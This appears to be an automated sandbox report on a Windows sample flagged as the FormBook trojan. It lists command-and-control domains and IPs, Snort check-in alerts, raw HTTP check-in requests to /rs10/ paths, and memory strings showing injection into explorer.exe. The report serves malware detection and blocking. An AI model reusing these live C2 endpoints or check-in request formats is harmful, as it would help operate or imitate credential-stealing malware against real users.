Source: http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs	Avira URL Cloud: Label: malware
Source: http://www.rewmio.xyz/rs10/www.totalkfood.com	Avira URL Cloud: Label: phishing
Source: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.robertjamesfineclothing.com	Avira URL Cloud: Label: phishing
Source: http://www.guillaumecarreau.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.cryptarrow.com/rs10/www.starryallure.com	Avira URL Cloud: Label: malware
Source: http://www.mtauratarnt.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.cryptarrow.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.starryallure.com/rs10/www.roundaboutlogistics.com	Avira URL Cloud: Label: malware
Source: http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs	Avira URL Cloud: Label: malware
Source: http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs	Avira URL Cloud: Label: malware
Source: https://login.microsoftonline.co	Avira URL Cloud: Label: phishing
Source: http://www.hdlive7.live/rs10/	Avira URL Cloud: Label: malware
Source: http://www.robertjamesfineclothing.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com	Avira URL Cloud: Label: malware
Source: http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs	Avira URL Cloud: Label: malware
Source: http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond	Avira URL Cloud: Label: malware
Source: www.nightoracle.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.m-baer.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.m-baer.com/rs10/www.rewmio.xyz	Avira URL Cloud: Label: malware
Source: http://www.rewmio.xyz/rs10/	Avira URL Cloud: Label: phishing
Source: http://www.hdlive7.live	Avira URL Cloud: Label: malware
Source: http://www.guillaumecarreau.com/rs10/www.omarshafie.online	Avira URL Cloud: Label: malware
Source: http://www.guillaumecarreau.com	Avira URL Cloud: Label: malware
Source: http://www.nightoracle.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.starryallure.com/rs10/	Avira URL Cloud: Label: malware
Source: http://www.starryallure.com	Avira URL Cloud: Label: malware
Source: http://www.nightoracle.com	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: www.nightoracle.com	Virustotal: Detection: 5%	Perma Link
Source: www.m-baer.com	Virustotal: Detection: 5%	Perma Link
Source: www.robertjamesfineclothing.com	Virustotal: Detection: 8%	Perma Link
Source: www.starryallure.com	Virustotal: Detection: 7%	Perma Link
Source: http://www.robertjamesfineclothing.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.m-baer.com	Virustotal: Detection: 5%	Perma Link

Machine Learning detection for sample

Source: GCeHcfCef8.exe

Joe Sandbox ML: detected

Source: GCeHcfCef8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: GCeHcfCef8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EWuh.pdb source: GCeHcfCef8.exe
Source:	Binary string: EWuh.pdbSHA256. source: GCeHcfCef8.exe
Source:	Binary string: cmmon32.pdb source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: GCeHcfCef8.exe, GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 4x nop then pop edi		2_2_00416CEB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi		4_2_00416CEB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.186.223.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.69.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.19.157.23 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.247.82.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49713 -> 103.224.212.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49714 -> 35.186.223.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49716 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49717 -> 104.19.157.23:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49718 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49721 -> 103.224.212.210:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49722 -> 104.21.69.174:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49723 -> 104.247.82.51:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.nightoracle.com/rs10/

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1Host: www.fhstbanknigeria.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1Host: www.m-baer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1Host: www.totalkfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1Host: www.cryptarrow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1Host: www.starryallure.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 134Content-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 06:28:30 GMTConnection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 24 Oct 2023 06:29:11 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 24 Oct 2023 06:29:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 24 Oct 2023 06:30:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QFe%2BigM2W9xjZuxxhYuD21NF6hfLHhuYwiXnDDNNDNU9n7pvn3nhDKB7RfiTsFdJVKNDYT%2F5%2B8jgEa9mt8UfwfBlS6QwOE%2F5PgPz%2BprPHaw9wx2Qw%2FsapuixXTY3twvZjrTMszY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=13.999939Server: cloudflareCF-RAY: 81b02af23c27061b-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="no
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 24 Oct 2023 06:31:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.3800695222.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3084477649.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.3797222750.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1327213978.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1326487164.0000000007320000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193101829.0000000006AD5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.calm-plants.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.calm-plants.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.calm-plants.com/rs10/www.hdlive7.live
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.calm-plants.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-products-29334.bond
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-products-29334.bond/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-products-29334.bond/rs10/www.calm-plants.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cleaning-products-29334.bondReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cryptarrow.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cryptarrow.com/rs10/
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cryptarrow.com/rs10/www.starryallure.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cryptarrow.comReferer:
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fhstbanknigeria.com
Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fhstbanknigeria.com/rs10/
